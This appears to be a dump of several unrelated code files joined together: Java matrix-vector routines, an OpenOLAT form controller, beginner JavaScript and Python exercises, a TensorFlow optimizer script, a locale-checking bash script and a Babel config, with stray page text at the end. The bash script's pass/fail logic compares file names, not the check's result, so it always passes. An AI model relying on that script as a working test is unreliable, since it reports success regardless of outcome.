public double[] dm_stateless_A_times_x(DenseSymmetricMatrix A, double[] x) { //CSIGNORE
final int n = A.getNumberOfRows();
double[] tmp = new double[n];
double[] data = A.getData();
int ptr = 0;
for (int i = 0; i < n; i++) {
tmp[i] += data[ptr] * x[i];
ptr++;
for (int j = i + 1; j < n; j++) {
tmp[i] += data[ptr] * x[j];
tmp[j] += data[ptr] * x[i];
ptr++;
}
}
return tmp;
}
@Override
public double[] dm_stateless_AT_times_x(DenseSymmetricMatrix A, double[] x) { //CSIGNORE
return dm_stateless_A_times_x(A, x);
}
@Override
public double[] dm_stateless_alpha_times_A_times_x(double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
return BLAS1.dscal(alpha, dm_stateless_A_times_x(A, x));
}
@Override
public double[] dm_stateless_alpha_times_AT_times_x(double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
return dm_stateless_alpha_times_A_times_x(alpha, A, x);
}
@Override
public double[] dm_stateless_A_times_x_plus_y(DenseSymmetricMatrix A, double[] x, double[] y) { //CSIGNORE
final int n = A.getNumberOfRows();
double[] tmp = new double[n];
double[] data = A.getData();
int ptr = 0;
for (int i = 0; i < n; i++) {
tmp[i] += data[ptr] * x[i];
ptr++;
for (int j = i + 1; j < n; j++) {
tmp[i] += data[ptr] * x[j];
tmp[j] += data[ptr] * x[i];
ptr++;
}
tmp[i] += y[i];
}
return tmp;
}
@Override
public double[] dm_stateless_AT_times_x_plus_y(DenseSymmetricMatrix A, double[] x, double[] y) { //CSIGNORE
return dm_stateless_A_times_x_plus_y(A, x, y);
}
@Override
public double[] dm_stateless_alpha_times_A_times_x_plus_y(double alpha, DenseSymmetricMatrix A, double[] x, double[] y) { //CSIGNORE
final int rows = A.getNumberOfRows();
double[] tmp = dm_stateless_A_times_x(A, x);
for (int i = 0; i < rows; i++) {
tmp[i] = alpha * tmp[i] + y[i];
}
return tmp;
}
@Override
public double[] dm_stateless_alpha_times_AT_times_x_plus_y(double alpha, DenseSymmetricMatrix A, double[] x, double[] y) { //CSIGNORE
return dm_stateless_alpha_times_A_times_x_plus_y(alpha, A, x, y);
}
@Override
public double[] dm_stateless_A_times_x_plus_beta_times_y(DenseSymmetricMatrix A, double[] x, double beta, double[] y) { //CSIGNORE
final int rows = A.getNumberOfRows();
double[] tmp = dm_stateless_A_times_x(A, x);
for (int i = 0; i < rows; i++) {
tmp[i] += beta * y[i];
}
return tmp;
}
@Override
public double[] dm_stateless_AT_times_x_plus_beta_times_y(DenseSymmetricMatrix A, double[] x, double beta, double[] y) { //CSIGNORE
return dm_stateless_A_times_x_plus_beta_times_y(A, x, beta, y);
}
@Override
public double[] dm_stateless_alpha_times_A_times_x_plus_beta_times_y(double alpha, DenseSymmetricMatrix A, double[] x, double beta, double[] y) { //CSIGNORE
final int rows = A.getNumberOfRows();
double[] tmp = dm_stateless_A_times_x(A, x);
for (int i = 0; i < rows; i++) {
tmp[i] = alpha * tmp[i] + beta * y[i];
}
return tmp;
}
@Override
public double[] dm_stateless_alpha_times_AT_times_x_plus_beta_times_y(double alpha, DenseSymmetricMatrix A, double[] x, double beta, double[] y) { //CSIGNORE
return dm_stateless_alpha_times_A_times_x_plus_beta_times_y(alpha, A, x, beta, y);
}
@Override
public void dm_inplace_A_times_x(double[] y, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
final int n = A.getNumberOfRows();
double[] data = A.getData();
int ptr = 0;
Arrays.fill(y, 0);
for (int i = 0; i < n; i++) {
y[i] += data[ptr] * x[i];
ptr++;
for (int j = i + 1; j < n; j++) {
y[i] += data[ptr] * x[j];
y[j] += data[ptr] * x[i];
ptr++;
}
}
}
@Override
public void dm_inplace_AT_times_x(double[] y, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
dm_inplace_A_times_x(y, A, x);
}
@Override
public void dm_inplace_alpha_times_A_times_x(double[] y, double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
final int n = A.getNumberOfRows();
double[] data = A.getData();
int ptr = 0;
Arrays.fill(y, 0);
for (int i = 0; i < n; i++) {
y[i] += data[ptr] * x[i];
ptr++;
for (int j = i + 1; j < n; j++) {
y[i] += data[ptr] * x[j];
y[j] += data[ptr] * x[i];
ptr++;
}
}
BLAS1.dscalInplace(alpha, y);
}
@Override
public void dm_inplace_alpha_times_AT_times_x(double[] y, double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
dm_inplace_alpha_times_A_times_x(y, alpha, A, x);
}
@Override
public void dm_inplace_A_times_x_plus_y(double[] y, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
final int n = A.getNumberOfRows();
double[] data = A.getData();
int ptr = 0;
for (int i = 0; i < n; i++) {
y[i] += data[ptr] * x[i];
ptr++;
for (int j = i + 1; j < n; j++) {
y[i] += data[ptr] * x[j];
y[j] += data[ptr] * x[i];
ptr++;
}
}
}
@Override
public void dm_inplace_AT_times_x_plus_y(double[] y, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
dm_inplace_A_times_x_plus_y(y, A, x);
}
@Override
public void dm_inplace_alpha_times_A_times_x_plus_y(double[] y, double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
double[] tmp = dm_stateless_A_times_x(A, x);
final int n = A.getNumberOfRows();
for (int i = 0; i < n; i++) {
y[i] += tmp[i] * alpha;
}
}
@Override
public void dm_inplace_alpha_times_AT_times_x_plus_y(double[] y, double alpha, DenseSymmetricMatrix A, double[] x) { //CSIGNORE
dm_inplace_alpha_times_A_times_x_plus_y(y, alpha, A, x);
}
@Override
public void dm_inplace_A_times_x_plus_beta_times_y(double[] y, DenseSymmetricMatrix A, double[] x, double beta) { //CSIGNORE
double[] tmp = dm_stateless_A_times_x(A, x);
final int n = A.getNumberOfRows();
for (int i = 0; i < n; i++) {
y[i] = y[i] * beta + tmp[i];
}
}
@Override
public void dm_inplace_AT_times_x_plus_beta_times_y(double[] y, DenseSymmetricMatrix A, double[] x, double beta) { //CSIGNORE
dm_inplace_A_times_x_plus_beta_times_y(y, A, x, beta);
}
@Override
public void dm_inplace_alpha_times_A_times_x_plus_beta_times_y(double[] y, double alpha, DenseSymmetricMatrix A, double[] x, double beta) { //CSIGNORE
double[] tmp = dm_stateless_AT_times_x(A, x);
final int n = A.getNumberOfColumns();
for (int i = 0; i < n; i++) {
y[i] = beta * y[i] + alpha * tmp[i];
}
}
@Override
public void dm_inplace_alpha_times_AT_times_x_plus_beta_times_y(double[] y, double alpha, DenseSymmetricMatrix A, double[] x, double beta) { //CSIGNORE
dm_inplace_alpha_times_A_times_x_plus_beta_times_y(y, alpha, A, x, beta);
}
} // class end
|
/**
* <a href="http://www.openolat.org">
* OpenOLAT - Online Learning and Training</a><br>
* <p>
* Licensed under the Apache License, Version 2.0 (the "License"); <br>
* you may not use this file except in compliance with the License.<br>
* You may obtain a copy of the License at the
* <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache homepage</a>
* <p>
* Unless required by applicable law or agreed to in writing,<br>
* software distributed under the License is distributed on an "AS IS" BASIS, <br>
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. <br>
* See the License for the specific language governing permissions and <br>
* limitations under the License.
* <p>
* Initial code contributed and copyrighted by<br>
* frentix GmbH, http://www.frentix.com
* <p>
*/
package org.olat.modules.qpool.ui.metadata;
import static org.olat.modules.qpool.ui.metadata.MetaUIFactory.validateElementLogic;
import org.olat.core.gui.UserRequest;
import org.olat.core.gui.components.form.flexible.FormItemContainer;
import org.olat.core.gui.components.form.flexible.elements.StaticTextElement;
import org.olat.core.gui.components.form.flexible.elements.TextElement;
import org.olat.core.gui.components.form.flexible.impl.FormBasicController;
import org.olat.core.gui.components.form.flexible.impl.FormLayoutContainer;
import org.olat.core.gui.control.Controller;
import org.olat.core.gui.control.Event;
import org.olat.core.gui.control.WindowControl;
import org.olat.core.util.Formatter;
import org.olat.core.util.StringHelper;
import org.olat.core.util.Util;
import org.olat.modules.qpool.MetadataSecurityCallback;
import org.olat.modules.qpool.QPoolService;
import org.olat.modules.qpool.QuestionItem;
import org.olat.modules.qpool.QuestionItemAuditLog.Action;
import org.olat.modules.qpool.QuestionItemAuditLogBuilder;
import org.olat.modules.qpool.model.QuestionItemImpl;
import org.olat.modules.qpool.ui.QuestionsController;
import org.olat.modules.qpool.ui.events.QItemEdited;
import org.springframework.beans.factory.annotation.Autowired;
/**
*
* Initial date: 05.03.2013<br>
* @author srosse, <EMAIL>, http://www.frentix.com
*
*/
public class TechnicalMetadataEditController extends FormBasicController {
private StaticTextElement editorEl;
private StaticTextElement formatEl;
private StaticTextElement editorVersionEl;
private StaticTextElement lastModifiedEl;
private StaticTextElement statusLastModifiedEl;
private TextElement versionEl;
private FormLayoutContainer buttonsCont;
private QuestionItem item;
@Autowired
private QPoolService qpoolService;
public TechnicalMetadataEditController(UserRequest ureq, WindowControl wControl, QuestionItem item,
MetadataSecurityCallback securityCallback, boolean wideLayout) {
super(ureq, wControl, wideLayout ? LAYOUT_DEFAULT : LAYOUT_VERTICAL);
setTranslator(Util.createPackageTranslator(QuestionsController.class, getLocale(), getTranslator()));
this.item = item;
initForm(ureq);
setItem(item, securityCallback);
}
@Override
protected void initForm(FormItemContainer formLayout, Controller listener, UserRequest ureq) {
uifactory.addStaticTextElement("general.identifier", item.getIdentifier(), formLayout);
uifactory.addStaticTextElement("general.master.identifier", item.getMasterIdentifier(), formLayout);
editorEl = uifactory.addStaticTextElement("technical.editor", "", formLayout);
editorVersionEl = uifactory.addStaticTextElement("technical.editorVersion", "", formLayout);
formatEl = uifactory.addStaticTextElement("technical.format", "", formLayout);
Formatter formatter = Formatter.getInstance(getLocale());
String creationDate = formatter.formatDateAndTime(item.getCreationDate());
if(StringHelper.containsNonWhitespace(creationDate)) {
uifactory.addStaticTextElement("technical.creation", creationDate, formLayout);
}
lastModifiedEl = uifactory.addStaticTextElement("technical.lastModified", "", formLayout);
versionEl = uifactory.addTextElement("lifecycle.version", "lifecycle.version", 50, "", formLayout);
statusLastModifiedEl = uifactory.addStaticTextElement("technical.statusLastModified", "", formLayout);
buttonsCont = FormLayoutContainer.createButtonLayout("buttons", getTranslator());
buttonsCont.setRootForm(mainForm);
formLayout.add(buttonsCont);
uifactory.addFormCancelButton("cancel", buttonsCont, ureq, getWindowControl());
uifactory.addFormSubmitButton("ok", "ok", buttonsCont);
}
private void setReadOnly(MetadataSecurityCallback securityCallback) {
boolean canChangeVersion = securityCallback.canChangeVersion();
versionEl.setEnabled(canChangeVersion);
buttonsCont.setVisible(canChangeVersion);
}
private void updateUI() {
String editor = item.getEditor() == null ? "" : item.getEditor();
editorEl.setValue(editor);
String editorVersion = item.getEditorVersion() == null ? "" : item.getEditorVersion();
editorVersionEl.setValue(editorVersion);
String format = item.getFormat() == null ? "" : item.getFormat();
formatEl.setValue(format);
Formatter formatter = Formatter.getInstance(getLocale());
String lastModified = formatter.formatDateAndTime(item.getLastModified());
lastModifiedEl.setValue(lastModified);
lastModifiedEl.setVisible(StringHelper.containsNonWhitespace(lastModified));
versionEl.setValue(item.getItemVersion());
String statusLastModified = formatter.formatDateAndTime(item.getQuestionStatusLastModified());
statusLastModified = statusLastModified != null ? statusLastModified: "";
statusLastModifiedEl.setValue(statusLastModified);
statusLastModifiedEl.setVisible(StringHelper.containsNonWhitespace(statusLastModified));
}
public void setItem(QuestionItem item, MetadataSecurityCallback securityCallback) {
this.item = item;
updateUI();
if (securityCallback != null) {
setReadOnly(securityCallback);
}
}
@Override
protected void formCancelled(UserRequest ureq) {
fireEvent(ureq, Event.CANCELLED_EVENT);
}
@Override
protected boolean validateFormLogic(UserRequest ureq) {
boolean allOk = true;
allOk &= validateElementLogic(versionEl, versionEl.getMaxLength(), false, true);
return allOk &= super.validateFormLogic(ureq);
}
@Override
protected void formOK(UserRequest ureq) {
if(item instanceof QuestionItemImpl) {
QuestionItemImpl itemImpl = (QuestionItemImpl)item;
QuestionItemAuditLogBuilder builder = qpoolService.createAuditLogBuilder(getIdentity(),
Action.UPDATE_QUESTION_ITEM_METADATA);
builder.withBefore(itemImpl);
itemImpl.setItemVersion(versionEl.getValue());
item = qpoolService.updateItem(item);
builder.withAfter(itemImpl);
qpoolService.persist(builder.create());
fireEvent(ureq, new QItemEdited(item));
}
}
}
|
<reponame>Antoveravip/Software-University
/*
Info: JavaScript for JavaScript Basics Lesson 3, JavaScript Loops, Arrays, Strings, Task 2, Find Min and Max Number
Author: Removed for reasons of anonymity
Successfully checked as valid in JSLint Validator at: http://www.jslint.com/ and JSHint Validator at: http://www.jshint.com/
*/
'use strict';
function findMinAndMax(inputValue) {
var numbers = inputValue;
var length = numbers.length;
var minNumber;
var maxNumber;
var currentNumber;
var outputData = [];
if (length !== 0) {
minNumber = parseInt(numbers[0], 10);
maxNumber = parseInt(numbers[0], 10);
} else {
return "There is no numbers!";
}
var i = 0;
for (i = 1; i < length; i = i + 1) {
currentNumber = parseInt(numbers[i], 10);
if (currentNumber > maxNumber) {
maxNumber = currentNumber;
}
if (currentNumber < minNumber) {
minNumber = currentNumber;
}
}
outputData[0] = minNumber;
outputData[1] = maxNumber;
return outputData;
}
/* For html result view */
function findMinAndMaxByInput() {
var output = document.getElementById("output");
var nums = document.getElementById('data').value;
var elementP = document.createElement("p");
var result;
var outRes = "";
if (nums !== "") {
result = findMinAndMax(nums.split(/[\s,.]+/));
outRes = "Min -> " + result[0] + '\n' + "Max -> " + result[1];
} else {
outRes = "There is no numbers!";
}
elementP.innerHTML = outRes;
output.appendChild(elementP);
}
/* For node.js result */
var numbersArray = [
[1, 2, 1, 15, 20, 5, 7, 31],
[2, 2, 2, 2, 2],
[500, 1, -23, 0, -300, 28, 35, 12],
[]
];
var length = numbersArray.length;
var k = 0;
var res;
var outResult;
for (k = 0; k < length; k = k + 1) {
if (numbersArray[k].length !== 0) {
res = findMinAndMax(numbersArray[k]);
outResult = "Min -> " + res[0] + '\n' + "Max -> " + res[1];
} else {
outResult = "There is no numbers!";
}
console.log(outResult);
} |
#!/bin/bash
dieharder -d 101 -g 31 -S 1571643931
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Using standard optimizer, for comparing."""
import numpy as np
import tensorflow as tf
import time
from raw_implement import make_loss_and_gradients, n_dims, n_iters
tf.reset_default_graph()
def main(make_loss_and_gradients=make_loss_and_gradients,
n_dims=n_dims, n_iters=n_iters):
init_x = 100*np.ones([1, n_dims])
x = tf.Variable(init_x, dtype='float32')
loss, gradients = make_loss_and_gradients(x)
optimizer = tf.train.RMSPropOptimizer(0.01)
train_op = optimizer.minimize(loss)
tf.summary.scalar('meta-loss', loss)
summary_op = tf.summary.merge_all()
init = tf.global_variables_initializer()
with tf.Session() as sess:
writer = tf.summary.FileWriter('../dat/logdir/2', sess.graph)
sess.run(init)
time_start = time.time()
for step in range(n_iters):
loss_val, summary_val, _ = sess.run([loss, summary_op, train_op])
print(step, loss_val)
writer.add_summary(summary_val, step)
if loss_val < 1e-2:
break
elapsed_time = time.time() - time_start
print('Elapsed time: {} sec.'.format(elapsed_time))
# => Elapsed time: 8.54189419746399 sec.
if __name__ == '__main__':
main() |
VERSION='master' #Repository version
REPO='FriendsOfFlarum/gamification' #Repository name
LOCALE='resources/locale' #Locale folder path
YAML1='en.yml' #Original yaml file
YAML2='fof-gamification.yml' #Translated yaml file
TEMP_DIR=`mktemp -d`
WORK_DIR=`pwd`
GREEN='\033[0;32m'
RED='\033[0;31m'
NC='\033[0m'
if ! [ -x "$(command -v same-yaml)" ]; then
echo 'Error: same-yaml is not installed.' >&2
exit 1
fi
if [[ ! "$TEMP_DIR" || ! -d "$TEMP_DIR" ]]; then
exit 1
fi
function cleanup {
rm -rf "$TEMP_DIR"
}
cd "$TEMP_DIR"
curl -s -L "https://raw.githubusercontent.com/$REPO/$VERSION/$LOCALE/$YAML1" > $YAML1
RC=0
echo "Testing $YAML1 against $YAML2:"
same-yaml --ref "$YAML1" --tra "$WORK_DIR/locale/$YAML2"
if [ $YAML1 = $YAML2 ]
then
RC=1
printf "${RED}⨉ failed${NC}\n"
else
printf "${GREEN}✓ passed${NC}\n"
fi
trap cleanup EXIT
exit $RC
|
<filename>intro/part02-20_next_leap_year/src/next_leap_year.py<gh_stars>0
# Write your solution here
year = int(input("YEAR: "))
t = 0
while True:
t += 1
if ((year + t)%4 == 0):
if (year + t)%100 != 0:
print(f"The next leap year after {year} is {year+t}")
break
else:
if (year + t)%400 == 0:
print(f"The next leap year after {year} is {year+t}")
break
else:
print(f"The next leap year after {year} is {year+t+4}")
break
|
// @noflow
module.exports = {
presets: [
[require.resolve("@babel/preset-env"), { bugfixes: true }],
[require.resolve("@babel/preset-react"), { runtime: "classic" }],
require.resolve("@babel/preset-flow"),
],
plugins: [
require.resolve("babel-plugin-styled-components"),
require.resolve("@babel/plugin-proposal-class-properties"),
// the private methods plugin is needed for Storybook build to succeed
// https://github.com/storybookjs/storybook/issues/12093#issuecomment-675123136
require.resolve("@babel/plugin-proposal-private-methods"),
require.resolve("@babel/plugin-proposal-object-rest-spread"),
require.resolve("@babel/plugin-proposal-nullish-coalescing-operator"),
require.resolve("@babel/plugin-transform-runtime"),
require.resolve("@adeira/babel-preset-adeira/src/adeira-js-warning"),
require.resolve("@adeira/babel-preset-adeira/src/adeira-js-invariant"),
],
env: {
esm: {
presets: [[require.resolve("@babel/preset-env"), { modules: false, bugfixes: true }]],
plugins: [
require.resolve("babel-plugin-styled-components"),
[require.resolve("@babel/plugin-transform-runtime"), { useESModules: true }],
],
},
test: {
plugins: [
require.resolve("babel-plugin-styled-components"),
require.resolve("babel-plugin-require-context-hook"),
],
},
},
};
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.